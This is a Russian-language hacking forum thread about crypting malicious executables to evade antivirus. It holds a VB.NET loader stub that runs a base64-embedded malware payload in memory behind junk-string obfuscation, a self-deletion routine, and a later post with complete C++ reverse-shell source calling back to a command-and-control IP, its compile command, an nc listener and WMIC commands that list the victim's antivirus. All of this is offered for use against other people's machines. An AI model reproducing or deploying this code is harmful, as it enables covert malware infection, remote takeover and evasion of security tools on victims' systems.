Статья прячем вредоносный файл (криптовка ехе)

приветствую всех!) В последнее время заметил что у нас не хватает хард-кора как в былые времена) хех, будем исправлять! Представлю Вашему вниманию способ ручной криптовки вредоносного файла на языке visual basic

Открываем visual-studio, создаем новый проект.

и добавляем простой модуль)

и вставляем содержимое:

​

module module1
    Dim KvCNAb As String = "OShsVHguqFKtJCNMyhGvWShHHS"
    Dim NysgqucHukACdAGRVasNmKWRyi As String = "CdmNbayBJHNCsymvsRCHsHgHiMGsBrvjyyBSgitAEC"
    Dim uMHACNOFhOTsgkMcHVBCBCBEmS As String = "gOhBcCNEqSiscNMKbEvBhhggtuhCsMNMVGuMhSBgRH"
    Dim hcrucNgRBktbmGsssjqMsCCgVR As String = "hGgcuyWhAOgNcraAACihSurrAhvNNBSFEHsusABmHVRsasrhCFCkNsaCtTvONchNaMitdNCrBWucFsihBChOsWCusrrdcCHCViVuSusVsF"
    Dim FEiarSHNBVCMHgHamsGVcOcAsGsKWaNgycCyCivCSHdVsskAEiKrbtHvgrhsNBBigEMysdmCBgbigANrrNsAcgVJgh As String = "CEMcNHdkuHrgsHHqjVstNHiCEssbrBWmuNBcFjNuvB"
    Dim server() As Byte = Convert.FromBase64String("")
    Dim HdBcVRNtsHAgbOgsHcgaHCcdsuCSVNaAKRsrVJusNFBsOCFgBisbsAusCC As String = "BuHuWWsgFsHVErcNCuFhBBCtcGAFCugsmTVHjShMVa"
    Dim RagWAVdHCWssBHahvWNVBsSsjk As String = "NjshOGGjgFGcrKGdNrbHcJBFNBHJVTNiRaisgqMcKHBsyCmBVaygANKTuVMugFsSHVNuNVSshCrMHNKBsiHggsFJqA"
    Dim KFbuHBAsCNqmWCFABvvhyTsbMOgVcSNKRsNssVMHsO As String = "VvNNimTSNassaTsMgCgsEvVgNKMMicGMmjsCCkgCWKrKuHCkvddNamiWSE"
    Dim ABbACsSMANihrJWMrqgCTssisCasqVJrjHRKCENCgVgaqqWKguRMEBmAVgVKgNNhrNCargVraC As String = "qiGmsAFVghhCNhCgrdAVCBcgMisHTsdTaShtarshMGvasFtrtOFgBHGTjMNHMCKssiNCNTCrEGJMdrHaahCmagKcVF"
    Dim rMEHHuhATCaWhgdMKCigMRshSW As String = "vdCsBhrsvNNKHsSOJkaNHjCvuWuOsuRGKChFNthTyKHuCadaTAHiGRGaVg"
    Sub Main(ByVal kSsAggcSSuvrqFhWaSOisssyNuiWrNqhFcsEMMcSOHGSMrHujghdErsBhCBRMAHyCGSRVVNSHJHhgMHABsCsdghsaA() As String)
        Dim dCVrmTCBsSVvmiFCCSgNFjBhJsgrKhsCCajHgaCrHcmAsCCEgNAjjGmScChBgHCBBbEgHWBNhW As String = "HuMiaharBVNabhyNrsacNdySbcdqgCHHuMRhArGddEHccgOsFHjuaGBHBsCFVasCFaEvqmTvmy"
        Dim NskNhrHRHciVcduFNShNtuJabS As String = "hHhdCVmTGVEsMMsrHRChsGNjcVhOKMsNSFCVgHsCHgbcmsGSNRijkssahHsBaVhCKhNJMahTSFvciyFsdsaVyBiJSHtAhSgNujcBHVNNyT"
        Dim dargShFSBvmWssmmjTcNBhGugK As String = "icsbBskAAShBCFGgNsrrqCSFbmGNKbNBaHcBhHirhmacsCjuuhRsTNVgThKirjqMthcskEsNrS"
        Dim MghjgFBshWatNMsujrackSROmsiEBGEuVHsAgscaaBFiRgcgVkjvvSyNssORmgmCddgdugsiSNCFsCsCMmiiCBAsFu As String = "NHuNMmtNCJSBavMvHiiFbydAiGaRgdhyHviSBsgHsrsByuSdiiEtuRksAi"
        Dim aNiTEBsNvhdvrqMgOmhKuHySGN As String = "BASTVhdCHsNrJJGNbciSCNdVVBkKBqEVgvJBJhHNHh"
        Dim OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj() As Object = New Object(-1) {}
        Dim ssrVSVcrsCEdHFMgCvsNMmdstC As String = "vCGhhJyhChHGrHHHiSrGChSMMBVNsGdrsidTTiuEdgBBccHuGWCNcFdTjF"
        Dim bBuGrTsSCNCgBjtshONtsFsNvN As String = "MkKrCcaSbrBahGFSkVmsGuFSbFKuRcsFCSsciaiisHsvCKyMhvHMsVssar"
        Dim NsSuiHggNsBbFujEaCKhKasrWs As String = "NNVFAOiutsaVhhscjShiGigHJgHuFcMvhgiHBhyiJs"
        Dim SqSrHGSVBaSagASBruNVRHHtNCHhFFCMgSCTGTtEEBhVtRNcJsFiBsaqTNruNiCaBgTmAdstaRHTHybMyyHGNAOiFimshFiVHBhHsdFgqNhHcsuaVByNjKmSHC As String = "jNWNssacsKGNhhumuHCgththCsNBNcHhOMhCvshNCG"
        Dim hhhNdgNSrsNbrEsRsWBVvSBiRGJFvStMSiHWBqvOCc As String = "hCCucrCEsEJWMyaVbvHKhrvbsmHbNCMWgOiOvCgHAKWkacsCMVKChtsMBsCCqhESuusrssCAVyNCCmtiScNsNdAsrS"
        Dim FdcaOVssNNHsivOSyssdgtCrFS As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(server)
        Dim AkrrvKVMFhqigqABssHCiyRMAHyimiNHhCgrsCsCbaaCvSmdCsSbSsjSyc As String = "iBAOAAEHFHcgBsEOyrsFFqrSAg"
        Dim uhgFskGhmJycHBHdubBmsdSdiNHMBSMrrNrcmisrHbWVurbBSdBaNSmsmVSBdVFBBgatchustV As String = "EsCOcsECiCahBsOsKNharsvyGK"
        Dim aNgBBdsugcauqhsOuvhNKhhHgMCBrCsWHCHBhKaEbg As String = "qiiHBcsAWENihCSkVuSaAkOgac"
        Dim viBhsgtvAhurhhtKyVCsWNGsGOWCCyChrBCagEsshkshyMSsHtaNCrHOvG As String = "OdNVcussGcmVGcgaicCSuBbCss"
        Dim CrgBChgHSsSdAhasHtWEGCcVuMMsNsaCsTHrKyHiNRhSsCThETckjMBGAaCGsqNhVNCGhKsANsvAsmHTcbhNuCFMJrrHHgAhaSBqHvNmNBBssuKdCrmiNKdAkCMVhHsAdhGBqHBKCiMhBsGgvssVNhsFSj As String = "sMHHcSHMNaaqGqHENmuNCHqWJs"
        If FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.GetParameters().Length > 0 Then
            Dim CqhTsSdgFckAuAsjHCVFNrNJrGiVEHdBryTEskGMShJGSHKsyaaHsmWhhEcCkjNdsimggEgCHhgHFcNsVhSrNhsskR As String = "OShsVHguqFKtJCNMyhGvWShHHS"
            Dim igFWqCCdmHVisiScvdCrNbbdtHHSEsNNdNAHBcsJCAABiNGqdcKvqbMRKs As String = "FNHiKuBhAHivFTSsuhVNGCWsghEOsNCmgVSGEONaBG"
            Dim cNsMhgsVhAcTcVCmNCsEsAHihH As String = "NNNaiWGySJsOMjCGKastsHckiGsHstHssCusuGFHGsVsGuBOhEJOMmCCGh"
            Dim gAiBigiScbTOrgdquVtCcSqaJH As String = "hiHVBNrmBdHsmdiTVHcAFiMGyMHMNvsssSmCAsNrCtuBCtCghNmaErHigCHHrTMAHCMhycFuTa"
            Dim SsBMbhhBBvcHgSBNAkuhSmWTGN As String = "aNKKuKahrgAiHGCsgikNhsJHgCKgFuSShjshhSCugHJKthsyqKOTjNHshNhKTOHdViSVvBMgKbhrAghGBThAgGFsga"
            OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj = New Object() {FdcaOVssNNHsivOSyssdgtCrFS}
        End If
        Dim tsSvVhMVicMWumNHNHVMvdCSbr As String = "dScVsEBiNsriajSHWHMhHhHTKFMTdbgBSFsMahGgAacJHAMsSSMrEJENCO"
        Dim CdaHNNbKEcNHghTgsHuSgmaBCN As String = "KWchsNHidsyHHVhssbNBNvcHvbNscvNBcshbSstBCa"
        Dim tsctkishNcEcqtjMCsBbssAhaNvrMgBhNKFkbRBsCNiHiOgBBTvRCNqANHsaKgcrsHvmBFghNRhEuhHuACsjNiyHsV As String = "gCssdHhVBScHRHrVhvgqANgMrgFrAiChcMSkMsCautyFhcihJhcgKNNWsNmRrCCNisGgsBvrgi"
        Dim HsrBTsBEHaSAsCSyWsgGCssgBu As String = "uFVuNcAsdJOdOcBvMhVcMajCAdTsshCiqJqKHjHGCOMGssNsWiuaKAHTqu"
        Dim NshRMVicmAaHTGgHmBCjSuJNtj As String = "HqNNusTcVcChHHBWvtHVqEshscABCsANCrdMsFgKMCssHrrVGvsSvsishmCqBsCqdauVWscsBShaCmRCrKkqThABuCShahHkSumhGhNuHd"
        FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.Invoke(Nothing, OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj)
    End Sub

End Module

далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)

почти все готово, далее идем в свойства нашего нашего будущего ангельского приложения.

ииииииииииии собираем)

далее мы его обфусцируем (сожмем в размере и спрячем код) в прожке

Ссылка скрыта от гостей

и стартуем)


фсйо наша приложенька стала доброй и пушистой, почти)


а вот и хард-кор унизу): все как мы любим!

Good Luck! (гуд-лацк по Русски)


​

 

[LuckyNOOB]

Что сейчас актуально из приватных?

Что сам написал то и актуально)

Так понимаю, ответ на вопрос как сделать чтобы оно еще и самоудалилось я тут не найду

UPD

Вот функция самоудаления если кому-то пригодится.

Sub Terminate()
        Dim Body As String = "Set fso = CreateObject(""Scripting.FileSystemObject""): On error resume next: Dim I: I = 0" & vbCrLf & _
        "Set File = FSO.GetFile(""" & Application.ExecutablePath & """): Do while I = 0: fso.DeleteFile (""" & Application.ExecutablePath & """): fso.DeleteFile (""" & Application.StartupPath & "\1.vbs""): " & vbCrLf & _
        "If FSO.FileExists(File) = false Then: I = 1: End If: Loop"
        IO.File.WriteAllText(Application.StartupPath & "\1.vbs", Body, System.Text.Encoding.Default)
        Process.Start(Application.StartupPath & "\1.vbs")
    End Sub

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Terminate()
    End Sub

Вставляем в конце программы перед End Module. И вызываем командой Terminate()

Кстати вопрос к автору. Решил я попробовать данный метод иии.. Только хуже. Создать простой проект Hello world который просто создает текстовик. Вот virus total

Вот скрин до:

Вот после:

 

[Ondrik8]

Сигнатура..

 

[Gnom74]

Всем привет! Значить файл. Ехе. Со стиллера не криптуем?

 

[gushmazuko]

Msfvenom payload (reverse_tcp) можно таким образом "криптануть"?

Люди вообще форум не читают что ли? Вот же статья про это Meterpreter снова в деле | 100% FUD with Metasploit 5, не только reverse_tcp но и любой payload.

 

[Ondrik8]

Смотря какой стиллак если qwazar какойнить то можно.. или через лодер проливать

Люди вообще форум не читают что ли? Вот же статья про это Meterpreter снова в деле | 100% FUD with Metasploit 5, не только reverse_tcp но и любой payload.

он всегда был в деле)) просто нужно уметь его генерить! )) честно признаюсь сам только не давно к этому пришел, скажу что это не просто, но реально))

 

[Tihon49]

Люди вообще форум не читают что ли? Вот же статья про это Meterpreter снова в деле | 100% FUD with Metasploit 5, не только reverse_tcp но и любой payload.

Каюсь, стал реже заходить на форум. Погрузился в изучение питона.

 

[avbox]

.

 

[MrBa]

Зарегистрироваться так и не смог.
Error
Unknown server error

 

[avbox]

.

 

[managerfile2020]

Привет! Я

приветствую всех!) В последнее время заметил что у нас не хватает хард-кора как в былые времена) хех, будем исправлять! Представлю Вашему вниманию способ ручной криптовки вредоносного файла на языке visual basic

Открываем visual-studio, создаем новый проект.

Посмотреть вложение 19140


и добавляем простой модуль)


Посмотреть вложение 19141


Посмотреть вложение 19142



и вставляем содержимое:

​

module module1
    Dim KvCNAb As String = "OShsVHguqFKtJCNMyhGvWShHHS"
    Dim NysgqucHukACdAGRVasNmKWRyi As String = "CdmNbayBJHNCsymvsRCHsHgHiMGsBrvjyyBSgitAEC"
    Dim uMHACNOFhOTsgkMcHVBCBCBEmS As String = "gOhBcCNEqSiscNMKbEvBhhggtuhCsMNMVGuMhSBgRH"
    Dim hcrucNgRBktbmGsssjqMsCCgVR As String = "hGgcuyWhAOgNcraAACihSurrAhvNNBSFEHsusABmHVRsasrhCFCkNsaCtTvONchNaMitdNCrBWucFsihBChOsWCusrrdcCHCViVuSusVsF"
    Dim FEiarSHNBVCMHgHamsGVcOcAsGsKWaNgycCyCivCSHdVsskAEiKrbtHvgrhsNBBigEMysdmCBgbigANrrNsAcgVJgh As String = "CEMcNHdkuHrgsHHqjVstNHiCEssbrBWmuNBcFjNuvB"
    Dim server() As Byte = Convert.FromBase64String("")
    Dim HdBcVRNtsHAgbOgsHcgaHCcdsuCSVNaAKRsrVJusNFBsOCFgBisbsAusCC As String = "BuHuWWsgFsHVErcNCuFhBBCtcGAFCugsmTVHjShMVa"
    Dim RagWAVdHCWssBHahvWNVBsSsjk As String = "NjshOGGjgFGcrKGdNrbHcJBFNBHJVTNiRaisgqMcKHBsyCmBVaygANKTuVMugFsSHVNuNVSshCrMHNKBsiHggsFJqA"
    Dim KFbuHBAsCNqmWCFABvvhyTsbMOgVcSNKRsNssVMHsO As String = "VvNNimTSNassaTsMgCgsEvVgNKMMicGMmjsCCkgCWKrKuHCkvddNamiWSE"
    Dim ABbACsSMANihrJWMrqgCTssisCasqVJrjHRKCENCgVgaqqWKguRMEBmAVgVKgNNhrNCargVraC As String = "qiGmsAFVghhCNhCgrdAVCBcgMisHTsdTaShtarshMGvasFtrtOFgBHGTjMNHMCKssiNCNTCrEGJMdrHaahCmagKcVF"
    Dim rMEHHuhATCaWhgdMKCigMRshSW As String = "vdCsBhrsvNNKHsSOJkaNHjCvuWuOsuRGKChFNthTyKHuCadaTAHiGRGaVg"
    Sub Main(ByVal kSsAggcSSuvrqFhWaSOisssyNuiWrNqhFcsEMMcSOHGSMrHujghdErsBhCBRMAHyCGSRVVNSHJHhgMHABsCsdghsaA() As String)
        Dim dCVrmTCBsSVvmiFCCSgNFjBhJsgrKhsCCajHgaCrHcmAsCCEgNAjjGmScChBgHCBBbEgHWBNhW As String = "HuMiaharBVNabhyNrsacNdySbcdqgCHHuMRhArGddEHccgOsFHjuaGBHBsCFVasCFaEvqmTvmy"
        Dim NskNhrHRHciVcduFNShNtuJabS As String = "hHhdCVmTGVEsMMsrHRChsGNjcVhOKMsNSFCVgHsCHgbcmsGSNRijkssahHsBaVhCKhNJMahTSFvciyFsdsaVyBiJSHtAhSgNujcBHVNNyT"
        Dim dargShFSBvmWssmmjTcNBhGugK As String = "icsbBskAAShBCFGgNsrrqCSFbmGNKbNBaHcBhHirhmacsCjuuhRsTNVgThKirjqMthcskEsNrS"
        Dim MghjgFBshWatNMsujrackSROmsiEBGEuVHsAgscaaBFiRgcgVkjvvSyNssORmgmCddgdugsiSNCFsCsCMmiiCBAsFu As String = "NHuNMmtNCJSBavMvHiiFbydAiGaRgdhyHviSBsgHsrsByuSdiiEtuRksAi"
        Dim aNiTEBsNvhdvrqMgOmhKuHySGN As String = "BASTVhdCHsNrJJGNbciSCNdVVBkKBqEVgvJBJhHNHh"
        Dim OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj() As Object = New Object(-1) {}
        Dim ssrVSVcrsCEdHFMgCvsNMmdstC As String = "vCGhhJyhChHGrHHHiSrGChSMMBVNsGdrsidTTiuEdgBBccHuGWCNcFdTjF"
        Dim bBuGrTsSCNCgBjtshONtsFsNvN As String = "MkKrCcaSbrBahGFSkVmsGuFSbFKuRcsFCSsciaiisHsvCKyMhvHMsVssar"
        Dim NsSuiHggNsBbFujEaCKhKasrWs As String = "NNVFAOiutsaVhhscjShiGigHJgHuFcMvhgiHBhyiJs"
        Dim SqSrHGSVBaSagASBruNVRHHtNCHhFFCMgSCTGTtEEBhVtRNcJsFiBsaqTNruNiCaBgTmAdstaRHTHybMyyHGNAOiFimshFiVHBhHsdFgqNhHcsuaVByNjKmSHC As String = "jNWNssacsKGNhhumuHCgththCsNBNcHhOMhCvshNCG"
        Dim hhhNdgNSrsNbrEsRsWBVvSBiRGJFvStMSiHWBqvOCc As String = "hCCucrCEsEJWMyaVbvHKhrvbsmHbNCMWgOiOvCgHAKWkacsCMVKChtsMBsCCqhESuusrssCAVyNCCmtiScNsNdAsrS"
        Dim FdcaOVssNNHsivOSyssdgtCrFS As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(server)
        Dim AkrrvKVMFhqigqABssHCiyRMAHyimiNHhCgrsCsCbaaCvSmdCsSbSsjSyc As String = "iBAOAAEHFHcgBsEOyrsFFqrSAg"
        Dim uhgFskGhmJycHBHdubBmsdSdiNHMBSMrrNrcmisrHbWVurbBSdBaNSmsmVSBdVFBBgatchustV As String = "EsCOcsECiCahBsOsKNharsvyGK"
        Dim aNgBBdsugcauqhsOuvhNKhhHgMCBrCsWHCHBhKaEbg As String = "qiiHBcsAWENihCSkVuSaAkOgac"
        Dim viBhsgtvAhurhhtKyVCsWNGsGOWCCyChrBCagEsshkshyMSsHtaNCrHOvG As String = "OdNVcussGcmVGcgaicCSuBbCss"
        Dim CrgBChgHSsSdAhasHtWEGCcVuMMsNsaCsTHrKyHiNRhSsCThETckjMBGAaCGsqNhVNCGhKsANsvAsmHTcbhNuCFMJrrHHgAhaSBqHvNmNBBssuKdCrmiNKdAkCMVhHsAdhGBqHBKCiMhBsGgvssVNhsFSj As String = "sMHHcSHMNaaqGqHENmuNCHqWJs"
        If FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.GetParameters().Length > 0 Then
            Dim CqhTsSdgFckAuAsjHCVFNrNJrGiVEHdBryTEskGMShJGSHKsyaaHsmWhhEcCkjNdsimggEgCHhgHFcNsVhSrNhsskR As String = "OShsVHguqFKtJCNMyhGvWShHHS"
            Dim igFWqCCdmHVisiScvdCrNbbdtHHSEsNNdNAHBcsJCAABiNGqdcKvqbMRKs As String = "FNHiKuBhAHivFTSsuhVNGCWsghEOsNCmgVSGEONaBG"
            Dim cNsMhgsVhAcTcVCmNCsEsAHihH As String = "NNNaiWGySJsOMjCGKastsHckiGsHstHssCusuGFHGsVsGuBOhEJOMmCCGh"
            Dim gAiBigiScbTOrgdquVtCcSqaJH As String = "hiHVBNrmBdHsmdiTVHcAFiMGyMHMNvsssSmCAsNrCtuBCtCghNmaErHigCHHrTMAHCMhycFuTa"
            Dim SsBMbhhBBvcHgSBNAkuhSmWTGN As String = "aNKKuKahrgAiHGCsgikNhsJHgCKgFuSShjshhSCugHJKthsyqKOTjNHshNhKTOHdViSVvBMgKbhrAghGBThAgGFsga"
            OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj = New Object() {FdcaOVssNNHsivOSyssdgtCrFS}
        End If
        Dim tsSvVhMVicMWumNHNHVMvdCSbr As String = "dScVsEBiNsriajSHWHMhHhHTKFMTdbgBSFsMahGgAacJHAMsSSMrEJENCO"
        Dim CdaHNNbKEcNHghTgsHuSgmaBCN As String = "KWchsNHidsyHHVhssbNBNvcHvbNscvNBcshbSstBCa"
        Dim tsctkishNcEcqtjMCsBbssAhaNvrMgBhNKFkbRBsCNiHiOgBBTvRCNqANHsaKgcrsHvmBFghNRhEuhHuACsjNiyHsV As String = "gCssdHhVBScHRHrVhvgqANgMrgFrAiChcMSkMsCautyFhcihJhcgKNNWsNmRrCCNisGgsBvrgi"
        Dim HsrBTsBEHaSAsCSyWsgGCssgBu As String = "uFVuNcAsdJOdOcBvMhVcMajCAdTsshCiqJqKHjHGCOMGssNsWiuaKAHTqu"
        Dim NshRMVicmAaHTGgHmBCjSuJNtj As String = "HqNNusTcVcChHHBWvtHVqEshscABCsANCrdMsFgKMCssHrrVGvsSvsishmCqBsCqdauVWscsBShaCmRCrKkqThABuCShahHkSumhGhNuHd"
        FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.Invoke(Nothing, OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj)
    End Sub

End Module

далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)


Посмотреть вложение 19143



почти все готово, далее идем в свойства нашего нашего будущего ангельского приложения.


Посмотреть вложение 19144



Посмотреть вложение 19145


ииииииииииии собираем)


Посмотреть вложение 19146



далее мы его обфусцируем (сожмем в размере и спрячем код) в прожке

Ссылка скрыта от гостей

Посмотреть вложение 19147


и стартуем)


фсйо наша приложенька стала доброй и пушистой, почти)


а вот и хард-кор унизу): все как мы любим!



Посмотреть вложение 19148

Good Luck! (гуд-лацк по Русски)


​

установил Visual Studio и уже измучался искать установку модулей. Где и как их поставить. В инете вообще мало про них инфы. У меня нет возможности добавления модуля, нет таких иконок. Помогите с этим пожалуйста!

 

[Ondrik8]

Привет! Я

установил Visual Studio и уже измучался искать установку модулей. Где и как их поставить. В инете вообще мало про них инфы. У меня нет возможности добавления модуля, нет таких иконок. Помогите с этим пожалуйста!

в свойствах проекта:
правая кнопка мыши и добавить)

но это уже старая метода!! Уже все по другому делается!

 

[managerfile2020]

в свойствах проекта:
правая кнопка мыши и добавить)

но это уже старая метода!! Уже все по другому делается!

Если не сложно, можете подсказать? Можем переписаться в телеге

 

[Ondrik8]

да, Ondrik8 моя телега)

 

[Ondrik8]

Приветствую всех, кто интересуется данной темой) Поступает очень много вопросов мне в телеграм и много кто заваливают личку с просьбой пояснить как обходить системы защит, предлогаю следующий вариант обхода, а именно первй этап. Цель данного этапа, заселится в испытуемую машину узнать какой именно у нее установлен АВ и далее вторым этапом обходить АВ , для вашего любомого С2 GUI софта к примеру NJRat или на его основе.

Код, как видите написан на "крестах" что затруднит его детект для большинства АВ, при желании можно его подписать цифровым сертификатом, (желательно от [любимого вами АВ))]) что так же даст нам преимущество.

#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024


void RunShell(char* C2Server, int C2Port) {
    while(true) {
        Sleep(5000);    // 5 секунд , рекомендую увеличить.

        SOCKET mySocket;
        sockaddr_in addr;
        WSADATA version;
        WSAStartup(MAKEWORD(2,2), &version);
        mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
        addr.sin_family = AF_INET;

        addr.sin_addr.s_addr = inet_addr(C2Server);
        addr.sin_port = htons(C2Port);

        if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) {
            closesocket(mySocket);
            WSACleanup();
            continue;
        }
        else {
            char RecvData[DEFAULT_BUFLEN];
            memset(RecvData, 0, sizeof(RecvData));
            int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
            if (RecvCode <= 0) {
                closesocket(mySocket);
                WSACleanup();
                continue;
            }
            else {
                char Process[] = "cmd.exe";
                STARTUPINFO sinfo;
                PROCESS_INFORMATION pinfo;
                memset(&sinfo, 0, sizeof(sinfo));
                sinfo.cb = sizeof(sinfo);
                sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
                sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
                CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
                WaitForSingleObject(pinfo.hProcess, INFINITE);
                CloseHandle(pinfo.hProcess);
                CloseHandle(pinfo.hThread);

                memset(RecvData, 0, sizeof(RecvData));
                int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
                if (RecvCode <= 0) {
                    closesocket(mySocket);
                    WSACleanup();
                    continue;
                }
                if (strcmp(RecvData, "exit\n") == 0) {
                    exit(0);
                }
            }
        }
    }
}

int main(int argc, char **argv) {
    FreeConsole();
    if (argc == 3) {
        int port  = atoi(argv[2]);
        RunShell(argv[1], port);
    }
    else {
        char host[] = "192.168.0.1";  // Указываем свой IP адрес, локальный\внешний-постоянный
        int port = 4444;                // Указываем порт.
        RunShell(host, port);
    }
    return 0;
}

Сборка > в Kali-Linux с помощью встроенного компилятора i686-w64-mingw32-g++

i686-w64-mingw32-g++ test.cpp -o test.exe -lws2_32 -lwininet -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Прием сессии:

nc -lvnp <номер порта в нашем случае 4444>

или рекомендую, данной утилитай которая при приеме сессии, автоматом обходит файрволы и ему подобные системы защит более подробно можете ознакомится по ссылке ниже или метасплойтом на тот случай если Вы захотите автоматизировать закрепление в системе или же запуск скрипта для выдачи имени АВ в автоматическом режиме без вашего участия:

GitHub - cytopia/pwncat: pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)

pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE) - cytopia/pwncat

github.com

Итог:
Сессия прилетела, осталось узнать что охраняет "вражескую" систему Windows. Для этого имеется команда:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

или можно узнать список программ которые стартуют автоматически:

wmic startup list full

Дальше, уже по желаню, можете использовать все как есть, обычно ПРОФИ так и делают) или же как я описывал выше криптовать свой GUI софт под определенный АВ тестирумой системы windows.

NetCat - Наше, Все! (Слова не мои, а одного очень знаменитого Человека.)

Второй этап возможно опишу чуть позднее) с таким не плохим на мой взгляд результатом:

Ссылка скрыта от гостей

 

[MrBa]

Второй этап возможно опишу чуть позднее

Лично я очень жду продолжение. Спасибо

 

[marcus holloway]

кто подскажет как конвертировать exe в base64?

 

[Ondrik8]

кто подскажет как конвертировать exe в base64?

teeknofil/TheHackToolBoxTeek

Collection of tools for pentesting & hacking. Contribute to teeknofil/TheHackToolBoxTeek development by creating an account on GitHub.

github.com

 

[Pernat1y]

кто подскажет как конвертировать exe в base64?

cat file.exe | base64

 

[marcus holloway]

cat file.exe | base64

и что это приложение или что ? можешь скинуть ссылку или это инструмент?

 

[Ondrik8]

cat file.exe | base64

попал ты Братан )))